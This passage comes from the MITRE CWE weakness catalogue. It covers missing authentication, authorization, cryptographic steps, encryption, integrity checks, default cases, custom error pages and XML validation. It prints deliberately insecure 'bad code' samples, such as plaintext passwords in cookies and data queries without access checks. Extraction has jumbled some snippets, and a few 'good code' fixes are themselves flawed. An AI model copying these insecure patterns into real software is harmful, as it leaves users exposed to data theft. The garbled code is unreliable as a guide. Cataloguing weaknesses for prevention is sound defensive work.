similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Research Gap
This concept needs further study. It is likely a factor in several weaknesses, possibly resultant as well. Overlaps Multiple Interpretation Errors (MIE).
CWE-306: Missing Authentication for Critical Function
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the following Java example the method createBankAccount is used to create a BankAccount object for a bank management application. (bad code)
Example Language: Java
public BankAccount createBankAccount(String accountNumber, String accountType,
String accountName, String accountSSN, double balance) { BankAccount account = new BankAccount();
account.setAccountNumber(accountNumber); account.setAccountType(accountType); account.setAccountOwnerName(accountName); account.setAccountOwnerSSN(accountSSN); account.setBalance(balance); return account; However, there is no authentication mechanism to ensure that the user creating this bank account object has the authority to create new bank accounts. Some authentication mechanisms should be used to verify that the user has the authority to create bank account objects. The following Java code includes a boolean variable and method for authenticating a user. If the user has not been authenticated then the createBankAccount will not create the bank account object. (good code)
Example Language: Java
private boolean isUserAuthentic = false;
// authenticate user, // if user is authenticated then set variable to true // otherwise set variable to false public boolean authenticateUser(String username, String password) { ... }public BankAccount createNewBankAccount(String accountNumber, String accountType, String accountName, String accountSSN, double balance) { BankAccount account = null;
if (isUserAuthentic) { account = new BankAccount(); }account.setAccountNumber(accountNumber); account.setAccountType(accountType); account.setAccountOwnerName(accountName); account.setAccountOwnerSSN(accountSSN); account.setBalance(balance); return account; Example 2 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple vendors did not use any authentication for critical functionality in their OT products. Example 3 In 2021, a web site operated by PeopleGIS stored data of US municipalities in Amazon Web Service (AWS) Simple Storage Service (S3) buckets. (bad code)
Example Language: Other
A security researcher found 86 S3 buckets that could be accessed without authentication (CWE-306) and stored data unencrypted (CWE-312). These buckets exposed over 1000 GB of data and 1.6 million files including physical addresses, phone numbers, tax documents, pictures of driver's license IDs, etc. [REF-1296] [REF-1295]
While it was not publicly disclosed how the data was protected after discovery, multiple options could have been considered. (good code)
Example Language: Other
The sensitive information could have been protected by ensuring that the buckets did not have public read access, e.g., by enabling the s3-account-level-public-access-blocks-periodic rule to Block Public Access. In addition, the data could have been encrypted at rest using the appropriate S3 settings, e.g., by enabling server-side encryption using the s3-bucket-server-side-encryption-enabled setting. Other settings are available to further prevent bucket data from being leaked. [REF-1297]
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-862: Missing Authorization
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "CISQ Data Protection Measures" (View-1340)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This function runs an arbitrary SQL query on a given database, returning the result of the query. (bad code)
Example Language: PHP
function runEmployeeQuery($dbName, $name){
mysql_select_db($dbName,$globalDbHandle) or die("Could not open Database".$dbName); }//Use a prepared statement to avoid CWE-89 $preparedStatement = $globalDbHandle->prepare('SELECT * FROM employees WHERE name = :name'); $preparedStatement->execute(array(':name' => $name)); return $preparedStatement->fetchAll(); /.../ $employeeRecord = runEmployeeQuery('EmployeeDB',$_GET['EmployeeName']); While this code is careful to avoid SQL Injection, the function does not confirm the user sending the query is authorized to do so. An attacker may be able to obtain sensitive employee information from the database. Example 2 The following program could be part of a bulletin board system that allows users to send private messages to each other. This program intends to authenticate the user before deciding whether a private message should be displayed. Assume that LookupMessageObject() ensures that the $id argument is numeric, constructs a filename based on that id, and reads the message details from that file. Also assume that the program stores all private messages for all users in the same directory. (bad code)
Example Language: Perl
sub DisplayPrivateMessage {
my($id) = @_; }my $Message = LookupMessageObject($id); print "From: " . encodeHTML($Message->{from}) . "<br>\n"; print "Subject: " . encodeHTML($Message->{subject}) . "\n"; print "<hr>\n"; print "Body: " . encodeHTML($Message->{body}) . "\n"; my $q = new CGI; # For purposes of this example, assume that CWE-309 and # CWE-523 do not apply. if (! AuthenticateUser($q->param('username'), $q->param('password'))) { ExitError("invalid username or password"); }my $id = $q->param('id'); DisplayPrivateMessage($id); While the program properly exits if authentication fails, it does not ensure that the message is addressed to the user. As a result, an authenticated attacker could provide any arbitrary identifier and read private messages that were intended for other users. One way to avoid this problem would be to ensure that the "to" field in the message object matches the username of the authenticated user. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Terminology
Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource.
CWE-304: Missing Critical Step in Authentication
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product implements an authentication technique, but it skips a step that weakens the technique.
Authentication techniques should follow the algorithms that define them exactly, otherwise authentication can be bypassed or more easily subjected to brute force attacks.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-325: Missing Cryptographic Step
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not implement a required step in a cryptographic algorithm, resulting in weaker encryption than advertised by the algorithm.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
Relevant to the view "Hardware Design" (View-1194)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The example code is taken from the HMAC engine inside the buggy OpenPiton SoC of HACK@DAC'21 [REF-1358]. HAMC is a message authentication code (MAC) that uses both a hash and a secret crypto key. The HMAC engine in HACK@DAC SoC uses the SHA-256 module for the calculation of the HMAC for 512 bits messages. (bad code)
Example Language: Verilog
logic [511:0] bigData;
... hmac hmac(
.clk_i(clk_i),
.rst_ni(rst_ni && ~rst_4), .init_i(startHash && ~startHash_r), .key_i(key), .ikey_hash_i(ikey_hash), .okey_hash_i(okey_hash), .key_hash_bypass_i(key_hash_bypass), .message_i(bigData), .hash_o(hash), .ready_o(ready), .hash_valid_o(hashValid) However, this HMAC engine cannot handle messages that are longer than 512 bits. Moreover, a complete HMAC will contain an iterate hash function that breaks up a message into blocks of a fixed size and iterates over them with a compression function (e.g., SHA-256). Therefore, the implementation of the HMAC in OpenPiton SoC is incomplete. Such HMAC engines will not be used in real-world applications as the messages will usually be longer than 512 bits. For instance, OpenTitan offers a comprehensive HMAC implementation that utilizes a FIFO for temporarily storing the truncated message, as detailed in [REF-1359]. To mitigate this, implement the iterative function to break up a message into blocks of a fixed size. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-756: Missing Custom Error Page
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not return custom error pages to the user, possibly exposing sensitive information.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things). (bad code)
Example Language: Java
Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
try { }... } catch (ApplicationSpecificException ase) {logger.error("Caught: " + ase.toString()); }Example 2 The mode attribute of the <customErrors> tag in the Web.config file defines whether custom or default error pages are used. In the following insecure ASP.NET application setting, custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned. (bad code)
Example Language: ASP.NET
<customErrors mode="Off" />
A more secure setting is to set the custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned. (good code)
Example Language: ASP.NET
<customErrors mode="RemoteOnly" />
Another secure option is to set the mode attribute of the <customErrors> tag to use a custom page as follows: (good code)
Example Language: ASP.NET
<customErrors mode="On" defaultRedirect="YourErrorPage.htm" />
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-478: Missing Default Case in Multiple Condition Expression
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe code does not have a default case in an expression with multiple conditions, such as a switch statement.
If a multiple-condition expression (such as a switch in C) omits the default case but does not consider or handle all possible values that could occur, then this might lead to complex logical errors and resultant weaknesses. Because of this, further decisions are made based on poor information, and cascading failure results. This cascading failure may result in any number of security issues, and constitutes a significant failure in the system.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following does not properly check the return code in the case where the security_check function returns a -1 value when an error occurs. If an attacker can supply data that will invoke an error, the attacker can bypass the security check: (bad code)
Example Language: C
#define FAILED 0
#define PASSED 1 int result; ... result = security_check(data); switch (result) { case FAILED:
printf("Security check failed!\n");
exit(-1); //Break never reached because of exit() break; case PASSED: printf("Security check passed.\n");
break; // program execution continues... ... Instead a default label should be used for unaccounted conditions: (good code)
Example Language: C
#define FAILED 0
#define PASSED 1 int result; ... result = security_check(data); switch (result) { case FAILED:
printf("Security check failed!\n");
exit(-1); //Break never reached because of exit() break; case PASSED: printf("Security check passed.\n");
break; default: printf("Unknown error (%d), exiting...\n",result);
exit(-1); This label is used because the assumption cannot be made that all possible cases are accounted for. A good practice is to reserve the default case for error handling. Example 2 In the following Java example the method getInterestRate retrieves the interest rate for the number of points for a mortgage. The number of points is provided within the input parameter and a switch statement will set the interest rate value to be returned based on the number of points. (bad code)
Example Language: Java
public static final String INTEREST_RATE_AT_ZERO_POINTS = "5.00";
public static final String INTEREST_RATE_AT_ONE_POINTS = "4.75"; public static final String INTEREST_RATE_AT_TWO_POINTS = "4.50"; ... public BigDecimal getInterestRate(int points) { BigDecimal result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);
switch (points) { case 0:
result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);
break; case 1: result = new BigDecimal(INTEREST_RATE_AT_ONE_POINTS);
break; case 2: result = new BigDecimal(INTEREST_RATE_AT_TWO_POINTS);
break; return result; However, this code assumes that the value of the points input parameter will always be 0, 1 or 2 and does not check for other incorrect values passed to the method. This can be easily accomplished by providing a default label in the switch statement that outputs an error message indicating an invalid value for the points input parameter and returning a null value. (good code)
Example Language: Java
public static final String INTEREST_RATE_AT_ZERO_POINTS = "5.00";
public static final String INTEREST_RATE_AT_ONE_POINTS = "4.75"; public static final String INTEREST_RATE_AT_TWO_POINTS = "4.50"; ... public BigDecimal getInterestRate(int points) { BigDecimal result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);
switch (points) { case 0:
result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);
break; case 1: result = new BigDecimal(INTEREST_RATE_AT_ONE_POINTS);
break; case 2: result = new BigDecimal(INTEREST_RATE_AT_TWO_POINTS);
break; default: System.err.println("Invalid value for points, must be 0, 1 or 2");
System.err.println("Returning null value for interest rate"); result = null; return result; Example 3 In the following Python example the match-case statements (available in Python version 3.10 and later) perform actions based on the result of the process_data() function. The expected return is either 0 or 1. However, if an unexpected result (e.g., -1 or 2) is obtained then no actions will be taken potentially leading to an unexpected program state. (bad code)
Example Language: Python
result = process_data(data)
match result: case 0:
print("Properly handle zero case.")
case 1: print("Properly handle one case.")
# program execution continues... The recommended approach is to add a default case that captures any unexpected result conditions, regardless of how improbable these unexpected conditions might be, and properly handles them. (good code)
Example Language: Python
result = process_data(data)
match result: case 0:
print("Properly handle zero case.")
case 1: print("Properly handle one case.")
case _: print("Properly handle unexpected condition.")
# program execution continues... Example 4 In the following JavaScript example the switch-case statements (available in JavaScript version 1.2 and later) are used to process a given step based on the result of a calcuation involving two inputs. The expected return is either 1, 2, or 3. However, if an unexpected result (e.g., 4) is obtained then no action will be taken potentially leading to an unexpected program state. (bad code)
Example Language: JavaScript
let step = input1 + input2;
switch(step) { case 1:
alert("Process step 1.");
break; case 2: alert("Process step 2.");
break; case 3: alert("Process step 3.");
break; } // program execution continues... The recommended approach is to add a default case that captures any unexpected result conditions and properly handles them. (good code)
Example Language: JavaScript
let step = input1 + input2;
switch(step) { case 1:
alert("Process step 1.");
break; case 2: alert("Process step 2.");
break; case 3: alert("Process step 3.");
break; default: alert("Unexpected step encountered.");
} // program execution continues... Example 5 The Finite State Machine (FSM) shown in the "bad" code snippet below assigns the output ("out") based on the value of state, which is determined based on the user provided input ("user_input"). (bad code)
Example Language: Verilog
module fsm_1(out, user_input, clk, rst_n);
input [2:0] user_input; input clk, rst_n; output reg [2:0] out; reg [1:0] state; always @ (posedge clk or negedge rst_n ) begin
endmodule
if (!rst_n)
end
state = 3'h0;
elsecase (user_input)
3'h0:
endcase
3'h1: 3'h2: 3'h3: state = 2'h3; 3'h4: state = 2'h2; 3'h5: state = 2'h1; out <= {1'h1, state};
The case statement does not include a default to handle the scenario when the user provides inputs of 3'h6 and 3'h7. Those inputs push the system to an undefined state and might cause a crash (denial of service) or any other unanticipated outcome. Adding a default statement to handle undefined inputs mitigates this issue. This is shown in the "Good" code snippet below. The default statement is in bold. (good code)
Example Language: Verilog
case (user_input)
3'h0:
endcase3'h1: 3'h2: 3'h3: state = 2'h3; 3'h4: state = 2'h2; 3'h5: state = 2'h1; default: state = 2'h0;
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-311: Missing Encryption of Sensitive Data
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code writes a user's login information to a cookie so the user does not have to login again later. (bad code)
Example Language: PHP
function persistLogin($username, $password){
$data = array("username" => $username, "password"=> $password); }setcookie ("userdata", $data); The code stores the user's username and password in plaintext in a cookie on the user's machine. This exposes the user's login information if their computer is compromised by an attacker. Even if the user's machine is not compromised, this weakness combined with cross-site scripting (CWE-79) could allow an attacker to remotely copy the cookie. Also note this example code also exhibits Plaintext Storage in a Cookie (CWE-315). Example 2 The following code attempts to establish a connection, read in a password, then store it to a buffer. (bad code)
Example Language: C
server.sin_family = AF_INET; hp = gethostbyname(argv[1]);
if (hp==NULL) error("Unknown host"); memcpy( (char *)&server.sin_addr,(char *)hp->h_addr,hp->h_length); if (argc < 3) port = 80; else port = (unsigned short)atoi(argv[3]); server.sin_port = htons(port); if (connect(sock, (struct sockaddr *)&server, sizeof server) < 0) error("Connecting"); ... while ((n=read(sock,buffer,BUFSIZE-1))!=-1) { write(dfd,password_buffer,n); ... While successful, the program does not encrypt the data before writing it to a buffer, possibly exposing it to unauthorized actors. Example 3 The following code attempts to establish a connection to a site to communicate sensitive information. (bad code)
Example Language: Java
try {
URL u = new URL("http://www.secret.example.org/"); }HttpURLConnection hu = (HttpURLConnection) u.openConnection(); hu.setRequestMethod("PUT"); hu.connect(); OutputStream os = hu.getOutputStream(); hu.disconnect(); catch (IOException e) { //... Though a connection is successfully made, the connection is unencrypted and it is possible that all sensitive data sent to or received from the server will be read by unintended actors. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
There is an overlapping relationship between insecure storage of sensitive information (CWE-922) and missing encryption of sensitive information (CWE-311). Encryption is often used to prevent an attacker from reading the sensitive data. However, encryption does not prevent the attacker from erasing or overwriting the data.
CWE-353: Missing Support for Integrity Check
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a transmission protocol that does not include a mechanism for verifying the integrity of the data during transmission, such as a checksum.
If integrity check values or "checksums" are omitted from a protocol, there is no way of determining if data has been corrupted in transmission. The lack of checksum functionality in a protocol removes the first application-level check of data that can be used. The end-to-end philosophy of checks states that integrity checks should be performed at the lowest level that they can be completely implemented. Excluding further sanity checks and input validation performed by applications, the protocol's checksum is the most important level of checksum, since it can be performed more completely than at any previous level and takes into account entire messages, as opposed to single packets.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In this example, a request packet is received, and privileged information is sent to the requester: (bad code)
Example Language: Java
while(true) {
DatagramPacket rp = new DatagramPacket(rData,rData.length); }outSock.receive(rp); InetAddress IPAddress = rp.getAddress(); int port = rp.getPort(); out = secret.getBytes(); DatagramPacket sp =new DatagramPacket(out, out.length, IPAddress, port); outSock.send(sp); The response containing secret data has no integrity check associated with it, allowing an attacker to alter the message without detection.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-112: Missing XML Validation
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product accepts XML from an untrusted source but does not validate the XML against the proper schema.
Most successful attacks begin with a violation of the programmer's assumptions. By accepting an XML document without validating it against a DTD or XML schema, the programmer leaves a door open for attackers to provide unexpected, unreasonable, or malicious input.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
